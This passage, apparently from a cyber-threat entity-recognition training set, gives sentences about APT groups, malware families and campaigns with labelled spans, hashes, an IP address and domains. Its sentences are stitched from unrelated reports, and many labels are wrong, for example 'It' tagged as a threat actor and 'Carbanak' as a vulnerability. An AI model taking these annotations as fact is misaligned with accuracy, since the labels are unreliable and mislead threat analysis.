Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface ( AMSI ) .", "spans": {"THREAT_ACTOR: Callisto": [[117, 125]], "THREAT_ACTOR: TA505": [[210, 215], [387, 392], [641, 646], [2103, 2108], [2416, 2421], [2544, 2549], [2771, 2776], [2921, 2926]], "MALWARE: FlowerPippi": [[230, 241], [2212, 2223]], "MALWARE: Backdoor.Win32.FLOWERPIPPI.A": [[244, 272]], "MALWARE: backdoor": [[283, 291]], "TOOL: emails": [[496, 502], [863, 869], [1129, 1135], [1491, 1497], [1610, 1616]], "THREAT_ACTOR: It": [[545, 547], [909, 911]], "MALWARE: FlawedAmmyy payload": [[619, 638], [1324, 1343]], "MALWARE: Wizard (.wiz) files": [[652, 671]], "MALWARE: FlawedAmmyy RAT": [[696, 711]], "THREAT_ACTOR: TA505’s": [[755, 762]], "MALWARE: Amadey botnet": [[893, 906]], "MALWARE: EmailStealer": [[957, 969]], "TOOL: email": [[1038, 1043], [2240, 2245], [3120, 3125]], "TOOL: .HTML": [[1265, 1270]], "TOOL: Excel/Word": [[1288, 1298]], "MALWARE: macro": [[1312, 1317]], "MALWARE: Amadey": [[1350, 1356]], "FILEPATH: ServHelper": [[1425, 1435]], "FILEPATH: spam emails": [[1670, 1681]], "ORGANIZATION: banks": [[1746, 1751]], "ORGANIZATION: Proofpoint": [[1856, 1866]], "THREAT_ACTOR: AndroMut": [[1892, 1900]], "FILEPATH: Gelup": [[2061, 2066]], "ORGANIZATION: ZLAB": [[2302, 2306]], "ORGANIZATION: high profile companies": [[2665, 2687]], "MALWARE: remote administration tool": [[2847, 2873]], "ORGANIZATION: Banking": [[3026, 3033]], "ORGANIZATION: Retail": [[3038, 3044]], "FILEPATH: i.cmd”": [[3244, 3250]], "FILEPATH: exit.exe”": [[3255, 3264]], 
"FILEPATH: rtegre.exe”": [[3358, 3369]], "FILEPATH: veter1605_MAPS_10cr0.exe”": [[3378, 3403]], "ORGANIZATION: Kaspersky": [[3421, 3430]], "THREAT_ACTOR: Turla": [[3471, 3476], [3551, 3556], [3689, 3694], [3878, 3883], [3976, 3981]], "MALWARE: PowerShell loader": [[3477, 3494]], "ORGANIZATION: military": [[3651, 3659]], "MALWARE: PowerShell": [[3704, 3714]], "TOOL: PowerShell": [[4008, 4018]], "TOOL: Antimalware Scan Interface": [[4050, 4076]], "TOOL: AMSI": [[4079, 4083]]}, "info": {"id": "cyberner_stix_train_004111", "source": "cyberner_stix_train"}} {"text": "Malware Capabilities The Cybereason Nocturnus team has been following EventBot since the beginning of March 2020 . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[25, 45]], "MALWARE: EventBot": [[70, 78]], "THREAT_ACTOR: Bisonal malware": [[129, 144]], "MALWARE: Bisonal": [[213, 220]], "MALWARE: Elise": [[370, 375]], "MALWARE: malware": [[376, 383]], "THREAT_ACTOR: Lotus Blossom": [[392, 405]]}, "info": {"id": "cyberner_stix_train_004112", "source": "cyberner_stix_train"}} {"text": "Specific to this technique , if the C2 server is not available at the time of execution , the malicious code cannot be retrieved , rendering the delivery document largely benign .", "spans": {"TOOL: C2": [[36, 38]]}, "info": {"id": "cyberner_stix_train_004113", "source": "cyberner_stix_train"}} {"text": "However , the following email domains do not use Google mail servers and may have been targeted by other means :", "spans": {"TOOL: email": [[24, 29]], "ORGANIZATION: Google": [[49, 55]]}, "info": {"id": "cyberner_stix_train_004114", "source": "cyberner_stix_train"}} {"text": 
"Translate the client response object into the server version of the client response object .", "spans": {}, "info": {"id": "cyberner_stix_train_004115", "source": "cyberner_stix_train"}} {"text": "Money then disappears from the victim ’ s account and is cashed in without the owner ’ s knowledge . In the past , we have seen the group using open-source password dumpers such as Mimikatz . It exports the following functions , which are examined in greater detail below : DllMain Install UnInstall ServiceMain ShellMain ShellMainThread zxFunction001 zxFunction002 . An attacker with access to a valid cookie can establish an authenticated session to the NetScaler appliance without knowledge of the username , password , or access to a multi - factor authentication token or device .", "spans": {"TOOL: open-source password dumpers": [[144, 172]], "TOOL: Mimikatz": [[181, 189]], "THREAT_ACTOR: An attacker": [[368, 379]]}, "info": {"id": "cyberner_stix_train_004116", "source": "cyberner_stix_train"}} {"text": "Disturbingly , the malware establishes a rootkit on the device , allowing it to download and execute any code a cybercriminal would want to run on a device . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials .", "spans": {"THREAT_ACTOR: PLATINUM": [[158, 166]], "ORGANIZATION: specific individuals": [[240, 260]], "VULNERABILITY: zero-day exploits": [[301, 318]], "THREAT_ACTOR: APT10": [[397, 402]], "MALWARE: MSP": [[435, 438]], "ORGANIZATION: MSPs": [[465, 469]]}, "info": {"id": "cyberner_stix_train_004117", "source": "cyberner_stix_train"}} {"text": "A journey to Zebrocy land .", "spans": {"MALWARE: Zebrocy": [[13, 20]]}, "info": {"id": "cyberner_stix_train_004118", "source": "cyberner_stix_train"}} {"text": "Infection The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . The purpose is to be executed only once and steal data on the infected system , here are the main features : Keyloggers , Clipboard stealer , Firefox profiles and cookies stealer , Chrome profiles and cookies stealer , Opera profiles and cookies stealer .", "spans": {"ORGANIZATION: FireEye": [[123, 130]], "ORGANIZATION: Firefox": [[346, 353]], "ORGANIZATION: Chrome": [[385, 391]], "ORGANIZATION: Opera": [[423, 428]]}, "info": {"id": "cyberner_stix_train_004119", "source": "cyberner_stix_train"}} {"text": "The sub-function to decrypt the content skips the first 4 bytes , suggesting that the first four bytes of the downloaded content is in cleartext ( most likely the “ FWS ” or “ CWS ” header to look legitimate ) .", "spans": {"TOOL: FWS": [[165, 168]], "TOOL: CWS": [[176, 179]]}, "info": {"id": "cyberner_stix_train_004121", "source": "cyberner_stix_train"}} {"text": "CloudDuke is a malware toolset known to consist of , at least , a downloader , a loader and two backdoor variants .", "spans": {"MALWARE: CloudDuke": [[0, 9]], "TOOL: downloader": [[66, 76]], "TOOL: loader": [[81, 87]]}, "info": {"id": "cyberner_stix_train_004122", "source": 
"cyberner_stix_train"}} {"text": "While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities .", "spans": {"TOOL: InPage software": [[40, 55]], "ORGANIZATION: Unit42": [[110, 116]], "VULNERABILITY: InPage exploits": [[139, 154]], "ORGANIZATION: Kaspersky": [[250, 259]]}, "info": {"id": "cyberner_stix_train_004123", "source": "cyberner_stix_train"}} {"text": "Additionally , CTU researchers have observed evidence of BRONZE PRESIDENT targeting political and law enforcement organizations in countries adjacent to the PRC , including Mongolia and India .", "spans": {"ORGANIZATION: CTU": [[15, 18]], "THREAT_ACTOR: BRONZE PRESIDENT": [[57, 73]], "ORGANIZATION: PRC": [[157, 160]]}, "info": {"id": "cyberner_stix_train_004124", "source": "cyberner_stix_train"}} {"text": "The overlap between the HenBox and 9002 malware families Unit 42 has seen involves three shared C2s between several samples ; the first IP below is used for more than half of the HenBox samples we have seen to date : 47.90.81 [ . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . 
Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": {"MALWARE: HenBox": [[24, 30], [179, 185]], "MALWARE: 9002": [[35, 39]], "THREAT_ACTOR: APT41": [[230, 235]], "THREAT_ACTOR: Dukes": [[465, 470]]}, "info": {"id": "cyberner_stix_train_004125", "source": "cyberner_stix_train"}} {"text": "After getting a command from the C & C , the app is able to download a malicious payload in the form of a .dex file that is being dynamically loaded adding the additional malicious capabilities . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam . GandCrab Variant d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 ce1ee671fe5246a9c40b624ef97e4de1 GandCrab Variant aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 07f955796a252771861c8e0db06b1f01 GandCrab Variant 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec 4fcd0d13ea669a83a749ae5bfb098ca2 GandCrab Variant 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 8ec87fd3ea777fa8d5160dc957e6683e GandCrab Variant e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 c7d5077960882259b85c01fd41c49ffd . 
Then it calls with invalid value 69 .", "spans": {"ORGANIZATION: Volexity": [[202, 210], [285, 293]], "THREAT_ACTOR: threat actor": [[270, 282]], "THREAT_ACTOR: OceanLotus": [[347, 357]], "MALWARE: GandCrab": [[395, 403], [510, 518], [625, 633], [740, 748], [855, 863]], "FILEPATH: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[412, 476]], "FILEPATH: ce1ee671fe5246a9c40b624ef97e4de1": [[477, 509]], "FILEPATH: aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8": [[527, 591]], "FILEPATH: 07f955796a252771861c8e0db06b1f01": [[592, 624]], "FILEPATH: 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec": [[642, 706]], "FILEPATH: 4fcd0d13ea669a83a749ae5bfb098ca2": [[707, 739]], "FILEPATH: 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0": [[757, 821]], "FILEPATH: 8ec87fd3ea777fa8d5160dc957e6683e": [[822, 854]], "FILEPATH: e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776": [[872, 936]], "FILEPATH: c7d5077960882259b85c01fd41c49ffd": [[937, 969]]}, "info": {"id": "cyberner_stix_train_004126", "source": "cyberner_stix_train"}} {"text": "Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn ’ t present on their device . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . Before the service is started ChangeServiceConfig is called to modify the service type to shared and interactive . 
Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"TOOL: Open Babel": [[390, 400]]}, "info": {"id": "cyberner_stix_train_004127", "source": "cyberner_stix_train"}} {"text": "As such , this decision does not necessarily refer to a specific institution , but rather a collection of observations and behaviors observed across multiple , similarly-situated victims .", "spans": {}, "info": {"id": "cyberner_stix_train_004128", "source": "cyberner_stix_train"}} {"text": "But it would appear that BLU only took action after Kryptowire notified it along with Google , Adups and Amazon . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The group is responsible for the campaign known as Operation Wilted Tulip .", "spans": {"ORGANIZATION: BLU": [[25, 28]], "ORGANIZATION: Kryptowire": [[52, 62]], "ORGANIZATION: Google": [[86, 92]], "ORGANIZATION: Adups": [[95, 100]], "ORGANIZATION: Amazon": [[105, 111]], "ORGANIZATION: Check Point": [[236, 247]]}, "info": {"id": "cyberner_stix_train_004129", "source": "cyberner_stix_train"}} {"text": "If users or administrators detect the custom tools indicative of HIDDEN COBRA , these tools should be immediately flagged , reported to the DHS National Cybersecurity Communications and Integration Center ( NCCIC ) or the FBI Cyber Watch ( CyWatch ) , and given highest priority for enhanced mitigation .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[65, 77]], "ORGANIZATION: DHS": [[140, 143]], "ORGANIZATION: National Cybersecurity Communications and Integration Center": [[144, 204]], "ORGANIZATION: NCCIC": [[207, 212]], "ORGANIZATION: FBI": [[222, 225]]}, "info": {"id": "cyberner_stix_train_004130", "source": 
"cyberner_stix_train"}} {"text": "Likewise , many of CosmicDuke ’s persistence components use techniques also used by components associated with GeminiDuke and CozyDuke .", "spans": {"MALWARE: CosmicDuke": [[19, 29]], "MALWARE: GeminiDuke": [[111, 121]], "MALWARE: CozyDuke": [[126, 134]]}, "info": {"id": "cyberner_stix_train_004131", "source": "cyberner_stix_train"}} {"text": "Two of the four domains that have been hosted at this IP since 2016 — upfile2box.com and 7aga.net — were registered by a freelance web developer in Gaza , Palestine .", "spans": {"DOMAIN: upfile2box.com": [[70, 84]], "DOMAIN: 7aga.net": [[89, 97]]}, "info": {"id": "cyberner_stix_train_004132", "source": "cyberner_stix_train"}} {"text": "The overlays are activated by the malicious operator using the command changeActivity , as seen on step 5 of the activation cycle . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer . This particular sample is a loader that loads an encrypted payload for its functionality . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": {"THREAT_ACTOR: MuddyWater": [[132, 142]], "ORGANIZATION: government": [[396, 406]], "THREAT_ACTOR: Cl0p": [[470, 474]], "ORGANIZATION: several federal agencies": [[481, 505]]}, "info": {"id": "cyberner_stix_train_004133", "source": "cyberner_stix_train"}} {"text": "Port 6206 : Skype extraction service . We don't know the exact date Suckfly stole the certificates from the South Korean organizations . 
The contents of the decoy documents seems to include : This was followed by an executable downloader and payload concealed in an image file , likely to make its detection more difficult .", "spans": {"SYSTEM: Skype": [[12, 17]]}, "info": {"id": "cyberner_stix_train_004135", "source": "cyberner_stix_train"}} {"text": "In earlier versions , it operated with shell commands like this : Stealing WhatsApp encryption key with Busybox Social payload Actually , this is not a standalone payload file – in all the observed versions its code was compiled with exploit payload in one file ( ‘ poc_perm ’ , ‘ arrs_put_user ’ , ‘ arrs_put_user.o ’ ) . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Turla is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware .", "spans": {"MALWARE: Busybox Social payload": [[104, 126]], "THREAT_ACTOR: Attackers": [[323, 332]], "ORGANIZATION: political": [[411, 420]], "THREAT_ACTOR: Turla": [[450, 455]], "TOOL: leveraging in-house tools": [[526, 551]], "MALWARE: malware": [[556, 563]]}, "info": {"id": "cyberner_stix_train_004136", "source": "cyberner_stix_train"}} {"text": "Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication . so TAU is looking for newer versions ANEL samples . 
Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman ’s messages — three years worth .", "spans": {"SYSTEM: Microsoft Defender": [[59, 77]], "SYSTEM: Android": [[94, 101]], "TOOL: IWebBrowser2 COM": [[182, 198]], "ORGANIZATION: TAU": [[249, 252]], "THREAT_ACTOR: ANEL": [[283, 287]], "ORGANIZATION: Ashley Madison": [[313, 327]]}, "info": {"id": "cyberner_stix_train_004137", "source": "cyberner_stix_train"}} {"text": "The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "TOOL: web shell": [[42, 51]], "ORGANIZATION: users": [[184, 189]]}, "info": {"id": "cyberner_stix_train_004138", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 72.11.148.220 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 72.11.148.220": [[10, 23]]}, "info": {"id": "cyberner_stix_train_004139", "source": "cyberner_stix_train"}} {"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and “ spaghetti code ” , which is a technique that aims to confuse disassembly programs . iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) . As far as we can tell , its dropper was downloaded over HTTPS from api.goallbandungtravel.com . 
The downloader uses managed AES ( Rijndael algorithm ) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly .", "spans": {"MALWARE: FinFisher": [[76, 85]], "ORGANIZATION: iDefense": [[269, 277]], "ORGANIZATION: Defence Ministers ' Meeting": [[400, 427]], "ORGANIZATION: ADMM": [[430, 434]], "DOMAIN: api.goallbandungtravel.com": [[506, 532]], "MALWARE: The downloader": [[535, 549]]}, "info": {"id": "cyberner_stix_train_004140", "source": "cyberner_stix_train"}} {"text": "eSurv ’ s public marketing is centered around video surveillance software and image recognition systems , but there are a number of individuals claiming to be mobile security researchers working at the company , including one who has publically made claims to be developing a mobile surveillance agent . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . 
Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": {"ORGANIZATION: eSurv": [[0, 5]], "VULNERABILITY: Carbanak": [[379, 387]], "THREAT_ACTOR: cyber-criminal gang": [[392, 411]], "ORGANIZATION: financial institutions": [[513, 535]], "TOOL: Microsoft Word": [[623, 637]], "TOOL: PowerShell": [[708, 718]], "TOOL: PS": [[721, 723]]}, "info": {"id": "cyberner_stix_train_004141", "source": "cyberner_stix_train"}} {"text": "This report details our observations of APT28 ’s targeting , and our investigation into a related breach .", "spans": {"THREAT_ACTOR: APT28": [[40, 45]]}, "info": {"id": "cyberner_stix_train_004142", "source": "cyberner_stix_train"}} {"text": "We believe the primary purpose of this tactic is an attempt at evading detection in the targeted network .", "spans": {}, "info": {"id": "cyberner_stix_train_004143", "source": "cyberner_stix_train"}} {"text": "TrickMo uses accessibility services to identify and control some of these screens and make its own choices before giving the user a chance to react . Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 .", "spans": {"MALWARE: TrickMo": [[0, 7]], "THREAT_ACTOR: group": [[166, 171]], "TOOL: email credentials": [[226, 243]], "TOOL: personal information": [[246, 266]], "ORGANIZATION: technology organization": [[386, 409]]}, "info": {"id": "cyberner_stix_train_004144", "source": "cyberner_stix_train"}} {"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . 
Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": {"ORGANIZATION: government": [[37, 47]], "ORGANIZATION: Microsoft": [[152, 161]], "THREAT_ACTOR: PLATINUM": [[193, 201]], "ORGANIZATION: users": [[212, 217]]}, "info": {"id": "cyberner_stix_train_004145", "source": "cyberner_stix_train"}} {"text": "The actor typically targets Central Asian countries , Russia , Belarus , Mongolia , and others .", "spans": {}, "info": {"id": "cyberner_stix_train_004146", "source": "cyberner_stix_train"}} {"text": "In some deployments , we observed Sofacy actively developing and deploying a new package to a much smaller , specific subset of targets within the broader set .", "spans": {"THREAT_ACTOR: Sofacy": [[34, 40]]}, "info": {"id": "cyberner_stix_train_004147", "source": "cyberner_stix_train"}} {"text": "Some of BRONZE PRESIDENT 's malware has persistence capabilities .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[8, 24]]}, "info": {"id": "cyberner_stix_train_004148", "source": "cyberner_stix_train"}} {"text": "XLoader 6.0 also mirrors the way FakeSpy hides its real C & C server . FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors . This response tells the malware to: Set the file name for the data that will follow to 10140, Set the part number to 0, Parse response data, Set a 1 action for the next . 
Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"MALWARE: XLoader 6.0": [[0, 11]], "MALWARE: FakeSpy": [[33, 40]], "THREAT_ACTOR: FANCY BEAR": [[71, 81]], "THREAT_ACTOR: Sofacy": [[98, 104]], "THREAT_ACTOR: APT 28": [[108, 114]], "THREAT_ACTOR: threat actor": [[145, 157]], "ORGANIZATION: Aerospace": [[270, 279]], "ORGANIZATION: Defense": [[282, 289]], "ORGANIZATION: Energy": [[292, 298]], "ORGANIZATION: Government": [[301, 311]], "ORGANIZATION: Media sectors": [[316, 329]], "ORGANIZATION: Talos researchers": [[503, 520]], "TOOL: Open Babel": [[569, 579]]}, "info": {"id": "cyberner_stix_train_004149", "source": "cyberner_stix_train"}} {"text": "Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland . It expects the webpage to contain special HTML tags ; the backdoor will attempt to interpret the data between the tags as commands . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: FrozenCell": [[75, 85]], "ORGANIZATION: Kessem": [[101, 107]], "ORGANIZATION: banks": [[156, 161]], "ORGANIZATION: community banks": [[233, 248]], "ORGANIZATION: email service providers": [[253, 276]], "TOOL: HTML": [[331, 335]], "ORGANIZATION: Kaspersky": [[422, 431]], "MALWARE: the malware": [[491, 502]], "MALWARE: Winnti": [[525, 531]]}, "info": {"id": "cyberner_stix_train_004150", "source": "cyberner_stix_train"}} {"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . 
We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": {"MALWARE: entry": [[5, 10]], "TOOL: Reverse Engineering": [[74, 93]], "TOOL: Nick Harbour": [[96, 108]], "MALWARE: Powermud backdoor": [[164, 181]], "MALWARE: Backdoor.Powemuddy": [[201, 219]], "MALWARE: custom tools": [[228, 240]], "SYSTEM: Windows": [[341, 348]], "FILEPATH: makecab.exe": [[373, 384]]}, "info": {"id": "cyberner_stix_train_004151", "source": "cyberner_stix_train"}} {"text": "The beaconing only starts after the application is installed and removed from the running tasks . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 . Between early December 2018 and the end of January 2019 , Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware S-MALon S-MALvictim systems . Ashley Madison ’s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison ’s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": {"TOOL: DustySky": [[98, 106]], "THREAT_ACTOR: Rancor": [[255, 261]], "ORGANIZATION: Ashley Madison": [[379, 393]], "ORGANIZATION: Maggie McNeill": [[531, 545]], "ORGANIZATION: Ashley Madison ’s": [[590, 607]]}, "info": {"id": "cyberner_stix_train_004152", "source": "cyberner_stix_train"}} {"text": "This post does n't follow the chronological evolution of Zen , but instead covers relevant samples from least to most complex . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . 
Moreover , the exploit dropped a different malware payload , a backdoor we refer to as ELMER . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": {"MALWARE: Zen": [[57, 60]], "VULNERABILITY: CVE-2012-0158": [[180, 193]], "TOOL: NetTraveler Trojan": [[205, 223]], "MALWARE: ELMER": [[313, 318]]}, "info": {"id": "cyberner_stix_train_004153", "source": "cyberner_stix_train"}} {"text": "Once the user attempts to open the document , Microsoft Word immediately attempts to load the remote template containing a malicious macro and payload from the location specified within the settings.xml.rels file of the DOCX document .", "spans": {"ORGANIZATION: Microsoft": [[46, 55]], "TOOL: Word": [[56, 60]], "TOOL: malicious macro": [[123, 138]], "FILEPATH: settings.xml.rels": [[190, 207]], "TOOL: DOCX": [[220, 224]]}, "info": {"id": "cyberner_stix_train_004154", "source": "cyberner_stix_train"}} {"text": "] 975685 [ . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm . Richard_Johnson.doc : 878e4e8677e68aba918d930f2cc67fbe 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 . 
Based on the files ’ thumbnail images – the only content visible in the Windows Explorer window – the PowerPoint files imitate Ukraine ’s Ministry of Defence and Poland ’s Ministry of National Defence .", "spans": {"ORGANIZATION: citizens—journalists": [[21, 41]], "ORGANIZATION: software developers": [[44, 63]], "ORGANIZATION: politicians": [[66, 77]], "ORGANIZATION: researchers at universities": [[80, 107]], "ORGANIZATION: artists": [[114, 121]], "THREAT_ACTOR: Pawn Storm": [[143, 153]], "FILEPATH: Richard_Johnson.doc": [[156, 175]], "FILEPATH: 878e4e8677e68aba918d930f2cc67fbe": [[178, 210]], "FILEPATH: 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080": [[211, 275]], "ORGANIZATION: Ukraine ’s Ministry of Defence": [[405, 435]], "ORGANIZATION: Poland ’s Ministry of National Defence": [[440, 478]]}, "info": {"id": "cyberner_stix_train_004155", "source": "cyberner_stix_train"}} {"text": "The current dumpers have some similarities with those previously used by the group .", "spans": {}, "info": {"id": "cyberner_stix_train_004156", "source": "cyberner_stix_train"}} {"text": "Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": {"MALWARE: Honeycomb": [[0, 9]], "TOOL: Word": [[252, 256]], "VULNERABILITY: CVE-2017-11882": [[295, 309]], "FILEPATH: 'NavShExt.dll'": [[376, 390]], "FILEPATH: iexplore.exe": [[421, 433]]}, "info": {"id": "cyberner_stix_train_004157", "source": "cyberner_stix_train"}} {"text": "All the malicious Dvmap apps had the same functionality . 
Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits . Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites , it ’s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"MALWARE: Dvmap": [[18, 23]], "TOOL: COVELLITE malware": [[80, 97]], "TOOL: LAZARUS toolkits": [[132, 148]], "TOOL: OTA websites": [[253, 265]], "THREAT_ACTOR: Adversaries": [[375, 386]]}, "info": {"id": "cyberner_stix_train_004158", "source": "cyberner_stix_train"}} {"text": "GeminiDuke also occasionally embeds additional executables that attempt to achieve persistence on the victim computer .", "spans": {"MALWARE: GeminiDuke": [[0, 10]]}, "info": {"id": "cyberner_stix_train_004159", "source": "cyberner_stix_train"}} {"text": "BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms .", "spans": {"THREAT_ACTOR: BARIUM": [[0, 6]], "TOOL: social media platforms": [[159, 181]]}, "info": {"id": "cyberner_stix_train_004160", "source": "cyberner_stix_train"}} {"text": "Sofacy continued to use DealersChoice throughout the fall of 2016 , which we also documented in our December 2016 publication discussing Sofacy ’s larger campaign .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6], [137, 143]], "TOOL: DealersChoice": [[24, 37]]}, "info": {"id": "cyberner_stix_train_004161", "source": "cyberner_stix_train"}} {"text": "In a press briefing just two weeks ago , Deputy Attorney General Rod Rosenstein announced that the grand jury assembled by Special Counsel Robert Mueller had returned an indictment against 12 officers of Russia 's Main Intelligence Directorate of the Russian General Staff ( 
better known as Glavnoye razvedyvatel'noye upravleniye , or GRU ) .", "spans": {"ORGANIZATION: Glavnoye razvedyvatel'noye upravleniye": [[291, 329]], "ORGANIZATION: GRU": [[335, 338]]}, "info": {"id": "cyberner_stix_train_004162", "source": "cyberner_stix_train"}} {"text": "Importantly , the backdoor simply will not reveal its malicious nature unless Arabic language keyboard and settings are found on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_004163", "source": "cyberner_stix_train"}} {"text": "In addition , Kaspersky analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . 
